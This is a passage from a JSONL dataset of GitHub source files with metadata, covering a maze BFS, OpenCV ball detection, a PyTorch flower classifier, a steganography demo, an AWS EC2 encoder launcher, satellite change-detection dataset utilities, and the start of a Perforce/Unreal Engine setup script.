visited[x][y][k + 1]:\r\n visited[x][y][k + 1] = visited[i][j][k] + 1\r\n Q.append((x, y, k + 1))\r\n elif self.mat[x][y] == 0 and not visited[x][y][k]:\r\n visited[x][y][k] = visited[i][j][k] + 1\r\n Q.append((x, y, k))\r\n return -1\r\n\r\n\r\ndef main():\r\n maze = Maze()\r\n print(maze.move())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n input = sys.stdin.readline\r\n main()\r\n", "repo_name": "SeungWoo-You/PS", "sub_path": "백준/Gold/2206. 벽 부수고 이동하기/벽 부수고 이동하기.py", "file_name": "벽 부수고 이동하기.py", "file_ext": "py", "file_size_in_byte": 1451, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 20, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 46, "usage_type": "attribute"}]} +{"seq_id": "17004314430", "text": "# from tkinter import X\n# from tkinter.ttk import Style\n#import PIL.Image, PIL.ImageTk\nimport imutils as imutils\nfrom PIL import Image, ImageEnhance\n# import tkinter as tk\n# import math\n# from collections import deque\n# from imutils.video import VideoStream\nimport numpy as np\n# import argparse\nimport cv2\n\n\nH_MIN = 0;\nH_MAX = 256;\nS_MIN = 0;\nS_MAX = 256;\nV_MIN = 0;\nV_MAX = 256;\n# default capture width and height\nFRAME_WIDTH = 640;\nFRAME_HEIGHT = 480;\n# max number of objects to be detected in frame\nMAX_NUM_OBJECTS=50;\n# minimum and maximum object area\nMIN_OBJECT_AREA = 20*20;\nMAX_OBJECT_AREA = FRAME_HEIGHT*FRAME_WIDTH/1.5;\n\n\n#\n# def switches(switch):\n# cv2.createTrackbar(switch, 'Video Frame', 0, 1, applyVal)\n# cv2.createTrackbar('lower', 'Video Frame', 0, 255, applyVal)\n# cv2.createTrackbar('upper', 'Video Frame', 0, 255, applyVal)\n# cv2.createTrackbar('Blur', 'Video Frame', 3, 5, applyVal)\n\n\n#\n# # determine upper and lower HSV limits for (my) skin tones\n\n\n\ndef main():\n camera = cv2.VideoCapture(\"video.mp4\")\n # camera = cv2.VideoCapture(0)\n cv2.namedWindow('Original Output')\n #\n # switch = '0 : OFF \\n1 : ON'\n # switches(switch)\n\n while (True):\n ret, frame = camera.read()\n if not ret:\n continue\n #\n # lower_i = cv2.getTrackbarPos('lower', 'Original Output')\n # upper_i = cv2.getTrackbarPos('upper', 'Original Output')\n # s = cv2.getTrackbarPos(switch, 'Original Output')\n\n # referencias de cores para a bola verde\n # low_green = np.array([35, 40, 19])\n # up_green = np.array([82, 246, 139])\n\n lower = np.array([20, 207, 139], dtype=\"uint8\")\n upper = np.array([83,255,255], dtype=\"uint8\")\n # switches(switch)\n\n # lower = np.array([35, 40, 19], dtype=\"uint8\")\n # upper = np.array([82, 246, 139], dtype=\"uint8\")\n #\n\n\n # # switch to HSV\n\n #green_low_new\n # lower = np.array([17, 34, 18], dtype=\"uint8\")\n # upper = np.array([53, 139, 102], dtype=\"uint8\")\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n\n # #bola azul\n # lower = np.array([55, 80, 26], dtype=\"uint8\")\n # upper = np.array([110, 255, 187], dtype=\"uint8\")\n\n # find mask of pixels within HSV range\n mask = cv2.inRange(hsv, lower, upper)\n\n # cv2.imshow(\"Original\", frame)\n # # cv2.imshow(\"HSV\", hsv)\n # cv2.imshow(\"skinMask\", mask)\n\n # atualizar para a skinmask\n\n # construct a mask for the color \"green\", then perform\n # a series of dilations and erosions to remove any small\n # blobs left in the mask\n # mask = cv2.inRange(hsv, greenLower, greenUpper)\n\n #\n # mask = cv2.erode(mask, None, iterations=2)\n # mask = cv2.dilate(mask, None, iterations=2)\n #\n # cv2.imshow(\"skinMask2\", mask)\n\n #\n #\n # # find contours in the mask and initialize the current\n # # (x, y) center of the ball\n # cnts, hierarchy = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,\n # cv2.CHAIN_APPROX_SIMPLE)\n contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n # print(contours)\n\n for contour in contours:\n area = cv2.contourArea(contour)\n if area > 10:\n cv2.drawContours(frame, contour, -1, (0, 255, 0), 3)\n print(contours)\n\n\n cv2.imshow(\"Original\", frame)\n # cv2.imshow(\"HSV\", hsv)\n cv2.imshow(\"skinMask\", mask)\n\n\n # print(\"aqui conntor\",cnts)\n # print(\"aqui hierarquia\",hierarchy)\n #\n # cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n # print (cnts)\n # center = None\n\n # # # only proceed if at least one contour was found\n # if len(cnts) > 0:\n # # find the largest contour in the mask, then use\n # # it to compute the minimum enclosing circle and\n # # centroid\n # c = max(cnts, key=cv2.contourArea)\n # ((x, y), radius) = cv2.minEnclosingCircle(c)\n # M = cv2.moments(c)\n #\n # center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n #\n # # only proceed if the radius meets a minimum size\n # if radius > 5:\n # # draw the circle and centroid on the frame,\n # # then update the list of tracked points\n # cv2.circle(frame, (int(x), int(y)), int(radius),\n # (0, 255, 255), 2)\n # cv2.circle(frame, center, 5, (0, 0, 255), -1)\n\n # # update the points queue\n # pts.appendleft(center)\n\n if cv2.waitKey(100) == 27:\n break\n\n camera.release()\n cv2.destroyAllWindows()\n\n\n# def applyVal(value):\n# print('Applying blur!', value)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "thiagodalmoro/INF_UFRGS-Vision", "sub_path": "TrabFinal_Vision/test_ball_CTL.py", "file_name": "test_ball_CTL.py", "file_ext": "py", "file_size_in_byte": 4918, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.VideoCapture", "line_number": 45, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 80, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 125, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 157, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "30300691215", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom torchvision import datasets,transforms,models\nimport numpy as np\nimport json\nfrom collections import OrderedDict\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nimport helper\nimport numpy as np\nimport argparse\n\n\nparser = argparse.ArgumentParser(description='Image Classifier')\nparser.add_argument('--data_dir',type = str, default = './flowers', help = 'Path to dataset directory')\nparser.add_argument('--save_dir',type = str, default = './', help = 'Path to checkpint save directory')\nparser.add_argument('--arch',type = str, default = 'vgg', help = 'Tranfer learning model')\nparser.add_argument('--lr',type = float, default = 0.001, help = 'learning rate')\nparser.add_argument('--epochs',type = int, default = 10, help = 'epochs')\nparser.add_argument('--hidden_layers',type = int, default = 500, help = 'hidden units')\nparser.add_argument('--gpu',type = str, default = 'cpu', help = 'GPU or CPU')\n\nargs=parser.parse_args()\n\n\ndata_dir = args.data_dir\ntrain_dir = data_dir + '/train'\nvalid_dir = data_dir + '/valid'\ntest_dir = data_dir + '/test'\n\n\n\ntrain_transforms = transforms.Compose([transforms.RandomRotation(30),\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n\ntest_transforms = transforms.Compose([transforms.Resize(255),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\nvalidate_transforms=transforms.Compose([transforms.Resize(255),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n\n\ntrain_data = datasets.ImageFolder(train_dir, transform=train_transforms)\ntest_data = datasets.ImageFolder(test_dir, transform=test_transforms)\nvalidate_data=datasets.ImageFolder(test_dir, transform=test_transforms)\n\ntrainloader = torch.utils.data.DataLoader(train_data, batch_size=64, shuffle=True)\ntestloader = torch.utils.data.DataLoader(test_data, batch_size=64)\nvalidloader=torch.utils.data.DataLoader(validate_data, batch_size=64)\n\nif args.arch == 'vgg':\n input_size = 25088\n model = models.vgg16(pretrained=True)\nelif args.arch == 'resnet':\n input_size = 2048\n model = models.alexnet(pretrained=True)\n\nfor param in model.parameters():\n param.requires_grad = False\nmodel.classifier=nn.Sequential(nn.Linear(input_size, args.hidden_layers),\n nn.ReLU(),\n nn.Dropout(p=0.5),\n nn.Linear(args.hidden_layers,102),\n nn.LogSoftmax(dim=1))\nprint(model)\n\ncriterion=nn.NLLLoss()\ndevice=args.gpu\noptimizer=optim.Adam(model.classifier.parameters(), args.lr)\nloss,accuracy=helper.validate(model,criterion,testloader,device)\nprint(f\"loss: {loss} \\n Accuracy: {accuracy}\")\nepochs=args.epochs\nmodel=helper.train(model,optimizer,criterion,epochs,trainloader,validloader,device)\nhelper.accuracy(model,testloader,device)\nhelper.save(model,train_data,args.arch,input_size,args.hidden_layers,epochs,args.lr)\n\n\n\n\n", "repo_name": "Harish4948/Image-Classifier-using-Deep-Learning", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 3771, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 36, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomRotation", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 39, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 39, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 40, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 40, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 43, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 44, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 45, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 45, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 46, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 46, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 48, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 48, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 48, "usage_type": "call"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 49, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 49, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 50, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 50, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 51, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 51, "usage_type": "name"}, {"api_name": "torchvision.datasets.ImageFolder", "line_number": 55, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 55, "usage_type": "name"}, {"api_name": "torchvision.datasets.ImageFolder", "line_number": 56, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 56, "usage_type": "name"}, {"api_name": "torchvision.datasets.ImageFolder", "line_number": 57, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torchvision.models.vgg16", "line_number": 65, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 65, "usage_type": "name"}, {"api_name": "torchvision.models.alexnet", "line_number": 68, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 81, "usage_type": "name"}, {"api_name": "helper.validate", "line_number": 82, "usage_type": "call"}, {"api_name": "helper.train", "line_number": 85, "usage_type": "call"}, {"api_name": "helper.accuracy", "line_number": 86, "usage_type": "call"}, {"api_name": "helper.save", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "19641423651", "text": "from steganography import Steganography\nimport cv2\n\nif __name__ == '__main__':\n algo = Steganography(seed=2023)\n\n color = cv2.imread('img_1.png')\n grayscale = cv2.imread('img_2.png', flags=0)\n\n encrypted = algo.encrypt(grayscale, color)\n cv2.imwrite('encrypted.png', encrypted)\n\n decrypted = algo.decrypt(grayscale.shape, encrypted)\n cv2.imwrite('decrypted.png', decrypted)\n", "repo_name": "AliSK81/steganography", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 395, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "steganography.Steganography", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "43709700999", "text": "#! /usr/bin/python3\n\nimport argparse\nimport utils\nimport sys\nimport time\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser(\n description='EC2 tool',\n usage='e.g. ec2.py access_keyID secret_accessKEY --tag staging-innovi'\n )\n parser.add_argument('id', help=\"The aws access id\", type=str)\n parser.add_argument('key', help=\"The aws access key\", type=str)\n parser.add_argument('--name', help=\"Your name to load customize env configuration (elad/efrat/anna) \",\n choices=['elad', 'efrat', 'anna'], type=str, required=True)\n parser.add_argument('--builds', help=\"The desired build names (for e.g build-dev-3695, build-rc-1.2.1-3664)\",\n nargs='+', type=str, required=True)\n parser.add_argument('--amount', help=\"How many clips to create for each build\", type=int, default=10)\n parser.add_argument('--keep', help=\"Do not delete current machine clip\", action='store_true', default=False)\n parser.add_argument('--region', help=\"The aws region (default: us-west-2)\", type=str, default=\"us-west-2\")\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(\"\\nPlease see Usage\")\n return parser.parse_args()\n\n\ndef main():\n args = arg_parser()\n new_request = utils.EncoderClip(args.id, args.key, args.region, args.name, args.builds)\n if not args.keep:\n exists_machine = new_request.current_running_instances('Etool_Encoder_{}'.format(args.name))\n if exists_machine:\n new_request.terminate_instances(exists_machine)\n new_instance_id = new_request.create_clip_encoder()\n new_request.is_instance_status_ok(new_instance_id)\n new_instance_ip = new_request.instance_id_to_ip(new_instance_id)\n\n retries = 10\n while retries != 0:\n try:\n start_clips = utils.Ssh(new_instance_ip, 'ubuntu')\n except Exception as err:\n print(\"SSH to Encoder machine ({}) failed:{}\\nRetrying...\".format(new_instance_ip, err))\n retries -= 1\n time.sleep(10)\n else:\n break\n\n index = 0\n for build in args.builds:\n for clip in range(args.amount):\n start_clips.execute('./etool_testLoopDocker.sh {} {} {} {}'.format(args.name, index, index, build))\n index += 1\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "eshor-leshem/EtoolProject", "sub_path": "create_clip_machine_and_clips.py", "file_name": "create_clip_machine_and_clips.py", "file_ext": "py", "file_size_in_byte": 2318, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.EncoderClip", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.Ssh", "line_number": 43, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "7318754136", "text": "\"\"\"\nAuthor: Austin Dibble\n\"\"\"\n\nimport os\nimport shutil\nimport zipfile\nimport torch\nimport matplotlib.pyplot as plt\nfrom typing import Dict, Optional\nfrom torchvision.transforms.functional import to_pil_image\nfrom torchgeo.datasets.utils import draw_semantic_segmentation_masks\nimport numpy as np\nimport kornia.augmentation as K\n\ndef create_folder_if_not_exists(folder_path):\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n\ndef copy_file(source_path, destination_path):\n shutil.copy(source_path, destination_path)\n\ndef unzip_file(zip_path, extract_path):\n with zipfile.ZipFile(zip_path, 'r') as zip_ref:\n zip_ref.extractall(extract_path)\n\ndef move_folder(source_path, destination_path):\n shutil.move(source_path, destination_path)\n\ndef copy_and_unzip(local_path, drive_path, archive_name):\n print(f\"Copying the archive file '{archive_name}' from Google Drive to local folder...\")\n copy_file(os.path.join(drive_path, archive_name), os.path.join(local_path, archive_name))\n print(\"Archive file copied successfully.\")\n\n print(f\"Unzipping the archive file '{archive_name}'...\")\n unzip_file(os.path.join(local_path, archive_name), local_path)\n print(\"Archive file unzipped successfully.\")\n\ndef load_and_prepare_oscd(local_path=\"/content/datasets\", drive_path=\"/content/drive/MyDrive/2023_dissertation/dataset_archives/\"):\n if os.path.exists(os.path.join(local_path, \"OSCD\")):\n print(\"An 'OSCD' folder already exists in the local path. Skipping dataset loading and preparation.\")\n return\n \n create_folder_if_not_exists(local_path)\n\n OSCD = \"OSCD_Daudt_2018_full.zip\"\n copy_and_unzip(local_path, drive_path, OSCD)\n\n print(\"Moving the extracted folders and renaming if necessary...\")\n move_folder(os.path.join(local_path, \"Onera\"), os.path.join(local_path, \"OSCD\"))\n print(\"Main folder renamed successfully.\")\n\n # Define the folder mappings\n folder_mappings = {\n \"images\": \"Onera Satellite Change Detection dataset - Images\",\n \"train_labels\": \"Onera Satellite Change Detection dataset - Train Labels\",\n \"test_labels\": \"Onera Satellite Change Detection dataset - Test Labels\"\n }\n\n # Move and rename the extracted folders\n oscd_path = os.path.join(local_path, \"OSCD\")\n for source_folder, destination_folder in folder_mappings.items():\n source_path = os.path.join(oscd_path, source_folder)\n destination_path = os.path.join(oscd_path, destination_folder)\n print(f\"Renaming folder '{source_folder}' to '{destination_folder}'...\")\n move_folder(source_path, destination_path)\n print(f\"Folder '{source_folder}' renamed successfully to '{destination_folder}'.\")\n \n print(\"Dataset loading and preparation complete.\")\n\ndef load_and_prepare_omcd(local_path=\"/content/datasets\", drive_path=\"/content/drive/MyDrive/2023_dissertation/dataset_archives/\"):\n if os.path.exists(os.path.join(local_path, \"OMCD\")):\n print(\"An 'OMCD' folder already exists in the local path. Skipping dataset loading and preparation.\")\n return\n\n create_folder_if_not_exists(local_path)\n\n OMCD = \"OMCD_Li_2023.zip\"\n copy_and_unzip(local_path, drive_path, OMCD)\n\n print(\"Moving the extracted folders and renaming to OMCD...\")\n move_folder(os.path.join(local_path, \"open-pit mine change detection dataset\"), os.path.join(local_path, \"OMCD\"))\n print(\"Main folder renamed successfully.\")\n\n print(\"Dataset loading and preparation complete.\")\n\ndef crop_sample(dataset, index: int, size: int = 256):\n from torchvision.transforms import CenterCrop\n\n sample = dataset[index]\n cropper = CenterCrop(size)\n\n sample['image'] = cropper(sample['image'])\n sample['mask'] = cropper(sample['mask'])\n\n return sample\n\ndef normalize_sample(sample, mean, std):\n image = sample['image'].float()\n if len(image.shape) < 4:\n image = image.unsqueeze(0)\n normalize = K.Normalize(mean, std)\n normalized_image = normalize(image)\n sample['image'] = normalized_image\n return sample\n\ndef get_oscd_norm_coefficients(bands=\"rgb\"):\n # mean = OSCDDataModule.mean\n # std = OSCDDataModule.std\n mean = torch.tensor([1571.1372, 1365.5087, 1284.8223, 1298.9539, 1431.2260, 1860.9531,\n 2081.9634, 1994.7665, 2214.5986, 641.4485, 14.3672, 1957.3165,\n 1419.6107])\n std = torch.tensor([274.9591, 414.6901, 537.6539, 765.5303, 724.2261, 760.2133,\n 848.7888, 866.8081, 920.1696, 322.1572, 8.6878, 1019.1249,\n 872.1970])\n if bands == \"rgb\":\n mean = mean[[3, 2, 1]]\n std = std[[3, 2, 1]]\n\n mean = torch.cat([mean, mean], dim=0)\n std = torch.cat([std, std], dim=0)\n return mean, std\n\ndef get_omcd_norm_coefficients():\n # mean = OSCDDataModule.mean\n # std = OSCDDataModule.std\n mean = torch.tensor([121.7963, 123.6833, 116.5527])\n std = torch.tensor([67.2949, 68.0268, 65.1758])\n\n mean = torch.cat([mean, mean], dim=0)\n std = torch.cat([std, std], dim=0)\n return mean, std", "repo_name": "Dibz15/OpenMineChangeDetection", "sub_path": "datasets/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 5080, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 21, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 24, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 91, "usage_type": "call"}, {"api_name": "kornia.augmentation.Normalize", "line_number": 102, "usage_type": "call"}, {"api_name": "kornia.augmentation", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "20643986741", "text": "#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport os\n\nimport argparse\nimport socket\nimport subprocess\n\ndefault_ue_p4ignore = [\n \"Saved/\",\n \"LocalBuilds/\",\n \"**.csproj.**\",\n \".vs/**\",\n \"**.pdb\",\n \"**.suo\",\n \"**.opensdf\",\n \"*.sdf\",\n \"**.tmp\",\n \"**.mdb\",\n \"obj/\",\n \"**.vcxproj\",\n \"**.sln\",\n \"**-Debug.*\",\n \"FileOpenOrder/\",\n \"**.xcworkspace\",\n \"**.xcodeproj\",\n \"./Makefile\",\n \"./CMakeLists.txt\",\n \".ue4dependencies\",\n \"Samples/**\",\n \"FeaturePacks/*\",\n \"Templates/*\",\n \"Engine/Documentation/*\",\n \"\\n# Engine intermediates\",\n \"Engine/Intermediate/*\",\n \"Intermediate/\",\n \"\\n# Intermediate folders for programs should not be checked in\",\n r\"Engine\\Programs\\*\\Intermediate\\*\",\n \"\\n# Intermediate folders created for various C# programs\",\n r\"Engine\\Source\\Programs\\*\\obj\\*\",\n \"\\n# Saved folders for programs should not be checked in\",\n r\"Engine\\Programs\\*\\Saved\\*\",\n r\"Engine\\Programs\\UnrealBuildTool\\*\",\n \"\\n# Derived data cache should never be checked in\",\n \"Engine/DerivedDataCache/*\",\n \"\\n# Ignore any build receipts\",\n \"Engine/Build/Receipts/*\",\n \"\\n# Ignore personal workspace vars\",\n \".p4config\",\n \"\\n# Ignore Unix backup files\",\n \"*~\",\n \"\\n# Ignore Mac desktop services store files\",\n \".DS_Store\",\n \"\\n# Ignore crash reports\",\n \"crashinfo--*\",\n \"\\n# Ignore linux project files\",\n \"**.user\",\n \"**.pro\",\n \"**.pri\",\n \"**.kdev4\",\n \"\\n# Obj-C/Swift specific\",\n \"**.hmap\",\n \"**.ipa\",\n \"**.dSYM.zip\",\n \"**.dSYM\",\n \"\\n# Ignore documentation generated for C# tools\",\n \"Engine/Binaries/DotNET/UnrealBuildTool.xml\",\n \"Engine/Binaries/DotNET/AutomationScripts/BuildGraph.Automation.xml\",\n \"\\n# Ignore version files in the Engine/Binaries directory created by UBT\",\n \"/Engine/Binaries/**.version\",\n \"\\n# Ignore exp files in the the Engine/Binaries directory as they aren't C/C++ source files\",\n \"/Engine/Binaries/**.exp\",\n \"\\n# Ignore Swarm local save files\",\n \"Engine/Binaries/DotNET/SwarmAgent.DeveloperOptions.xml\",\n \"Engine/Binaries/DotNET/SwarmAgent.Options.xml\",\n \"\\n# Intermediary Files\",\n \"**.target.xml\",\n \"**.exe.config\",\n \"**.exe.manifest\",\n \"\\n# Ignore project-specific files\",\n \"GAMEPROJECT/Build/Receipts/**\",\n \"GAMEPROJECT/DerivedDataCache/**\",\n \"GAMEPROJECT/Binaries/*-Shipping.*\",\n \"GAMEPROJECT/Intermediate/**\",\n \"GAMEPROJECT/Saved/**\",\n]\n\ndefault_ue_typemap = [\n \"# Perforce File Type Mapping Specifications.\",\n \"#\",\n \"# TypeMap: a list of filetype mappings; one per line.\",\n \"# Each line has two elements:\",\n \"#\",\n \"# Filetype: The filetype to use on 'p4 add'.\",\n \"#\",\n \"# Path: File pattern which will use this filetype.\",\n \"#\",\n \"# See 'p4 help typemap' for more information.\",\n \"\",\n \"TypeMap:\",\n \" binary+S2w //depot/....exe\",\n \" binary+S2w //depot/....dll\",\n \" binary+S2w //depot/....lib\",\n \" binary+S2w //depot/....app\",\n \" binary+S2w //depot/....dylib\",\n \" binary+S2w //depot/....stub\",\n \" binary+S2w //depot/....ipa\",\n \" binary //depot/....bmp\",\n \" binary //depot/....png\",\n \" binary //depot/....tga\",\n \" binary //depot/....raw\",\n \" binary //depot/....r16\",\n \" binary //depot/....mb\",\n \" binary //depot/....fbx\",\n \" text //depot/....ini\",\n \" text //depot/....config\",\n \" text //depot/....cpp\",\n \" text //depot/....h\",\n \" text //depot/....c\",\n 